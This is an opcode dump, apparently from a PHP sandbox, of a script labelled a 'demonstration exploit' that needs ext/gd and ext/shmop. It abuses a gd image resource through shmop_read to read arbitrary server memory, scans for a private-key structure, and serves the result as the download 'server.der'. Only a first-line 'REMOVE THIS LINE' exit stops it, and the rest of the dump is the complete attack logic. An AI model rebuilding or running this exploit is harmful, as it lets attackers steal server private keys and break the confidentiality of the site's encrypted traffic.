Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 79) Position 1 = -2
filename:       /in/CJptn
function name:  (null)
number of ops:  77
compiled vars:  !0 = $offset, !1 = $data, !2 = $position, !3 = $length, !4 = $keydata
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
  16     0  E >   EXIT                                                     'REMOVE+THIS+LINE'
  18     1*       INIT_FCALL                                               'extension_loaded'
         2*       SEND_VAL                                                 'gd'
         3*       DO_ICALL                                         $5
         4*       BOOL_NOT                                         ~6      $5
         5*       JMPNZ_EX                                         ~6      ~6, ->11
         6*       INIT_FCALL                                               'extension_loaded'
         7*       SEND_VAL                                                 'shmop'
         8*       DO_ICALL                                         $7
         9*       BOOL_NOT                                         ~8      $7
        10*       BOOL                                             ~6      ~8
        11*       JMPZ                                                     ~6, ->13
  19    12*       EXIT                                                     'This+demonstration+exploit+only+works+with+ext%2Fgd+and+ext%2Fshmop+loaded.'
  41    13*       INIT_FCALL                                               'init'
        14*       DO_FCALL                                      0
  43    15*       ASSIGN                                                   !0, 134578176
  45    16*       JMP                                                      ->68
  47    17*       INIT_FCALL                                               'peek'
        18*       SEND_VAR                                                 !0
        19*       SEND_VAL                                                 1040
        20*       DO_FCALL                                      0  $11
        21*       ASSIGN                                                   !1, $11
  49    22*       INIT_FCALL                                               'strpos'
        23*       SEND_VAR                                                 !1
        24*       SEND_VAL                                                 '0%82'
        25*       DO_ICALL                                         $13
        26*       ASSIGN                                                   !2, $13
  50    27*       TYPE_CHECK                                  1018  ~15     !2
        28*       JMPZ_EX                                          ~15     ~15, ->31
        29*       IS_SMALLER                                       ~16     !2, 1024
        30*       BOOL                                             ~15     ~16
        31*       JMPZ                                                     ~15, ->67
  52    32*       INIT_FCALL                                               'substr'
        33*       SEND_VAR                                                 !1
        34*       ADD                                              ~17     !2, 4
        35*       SEND_VAL                                                 ~17
        36*       SEND_VAL                                                 4
        37*       DO_ICALL                                         $18
        38*       IS_EQUAL                                                 $18, '%02%01%00%02'
        39*       JMPZ                                                     ~19, ->67
  53    40*       INIT_FCALL                                               'ord'
        41*       ADD                                              ~20     !2, 2
        42*       FETCH_DIM_R                                      ~21     !1, ~20
        43*       SEND_VAL                                                 ~21
        44*       DO_ICALL                                         $22
        45*       MUL                                              ~23     $22, 256
        46*       INIT_FCALL                                               'ord'
        47*       ADD                                              ~24     !2, 3
        48*       FETCH_DIM_R                                      ~25     !1, ~24
        49*       SEND_VAL                                                 ~25
        50*       DO_ICALL                                         $26
        51*       ADD                                              ~27     ~23, $26
        52*       ADD                                              ~28     ~27, 4
        53*       ASSIGN                                                   !3, ~28
  54    54*       INIT_FCALL                                               'peek'
        55*       ADD                                              ~30     !0, !2
        56*       SEND_VAL                                                 ~30
        57*       SEND_VAR                                                 !3
        58*       DO_FCALL                                      0  $31
        59*       ASSIGN                                                   !4, $31
  56    60*       INIT_FCALL                                               'strpos'
        61*       SEND_VAR                                                 !4
        62*       SEND_VAL                                                 '%01%00%01'
        63*       DO_ICALL                                         $33
        64*       IS_SMALLER                                               0, $33
        65*       JMPZ                                                     ~34, ->67
  57    66*       JMP                                                      ->69
  60    67*       ASSIGN_OP                                     1          !0, 1024
  45    68*       JMPNZ                                                    1, ->17
  63    69*       INIT_FCALL                                               'header'
        70*       SEND_VAL                                                 'Content-type%3A+application%2Foctet-stream'
        71*       DO_ICALL
  64    72*       INIT_FCALL                                               'header'
        73*       SEND_VAL                                                 'Content-Disposition%3A+attachment%3B+filename%3D%22server.der%22'
        74*       DO_ICALL
  65    75*       ECHO                                                     !4
  66    76*     > RETURN                                                   1

Function init:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/CJptn
function name:  init
number of ops:  19
compiled vars:  !0 = $rid
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
  24     0  E >   BIND_GLOBAL                                              !0, 'rid'
  26     1        INIT_FCALL_BY_NAME                                       'imagecreate'
         2        SEND_VAL_EX                                              10
         3        SEND_VAL_EX                                              10
         4        DO_FCALL                                      0  $1
         5        ASSIGN                                                   !0, $1
  27     6        INIT_FCALL_BY_NAME                                       'imagecolorallocate'
         7        SEND_VAR_EX                                              !0
         8        SEND_VAL_EX                                              0
         9        SEND_VAL_EX                                              0
        10        SEND_VAL_EX                                              0
        11        DO_FCALL                                      0
  28    12        INIT_FCALL_BY_NAME                                       'imagecolorallocate'
        13        SEND_VAR_EX                                              !0
        14        SEND_VAL_EX                                              0
        15        SEND_VAL_EX                                              0
        16        SEND_VAL_EX                                              0
        17        DO_FCALL                                      0
  29    18      > RETURN                                                   null

End of function init

Function peek:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/CJptn
function name:  peek
number of ops:  31
compiled vars:  !0 = $addr, !1 = $size, !2 = $rid
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
  31     0  E >   RECV                                                     !0
         1        RECV                                                     !1
  33     2        BIND_GLOBAL                                              !2, 'rid'
  34     3        INIT_FCALL_BY_NAME                                       'imagecolordeallocate'
         4        SEND_VAR_EX                                              !2
         5        SEND_VAL_EX                                              0
         6        DO_FCALL                                      0
  35     7        INIT_FCALL_BY_NAME                                       'imagecolordeallocate'
         8        SEND_VAR_EX                                              !2
         9        SEND_VAL_EX                                              1
        10        DO_FCALL                                      0
  36    11        INIT_FCALL_BY_NAME                                       'imagecolorallocate'
        12        SEND_VAR_EX                                              !2
        13        SEND_VAR_EX                                              !0
        14        SEND_VAL_EX                                              0
        15        SEND_VAL_EX                                              0
        16        DO_FCALL                                      0
  37    17        INIT_FCALL_BY_NAME                                       'imagecolorallocate'
        18        SEND_VAR_EX                                              !2
        19        SEND_VAR_EX                                              !1
        20        SEND_VAL_EX                                              0
        21        SEND_VAL_EX                                              0
        22        DO_FCALL                                      0
  38    23        INIT_FCALL_BY_NAME                                       'shmop_read'
        24        CAST                                          4  ~7      !2
        25        SEND_VAL_EX                                              ~7
        26        SEND_VAL_EX                                              0
        27        SEND_VAR_EX                                              !1
        28        DO_FCALL                                      0  $8
        29      > RETURN                                                   $8
  39    30*     > RETURN                                                   null

End of function peek
Generated using Vulcan Logic Dumper, using php 8.0.0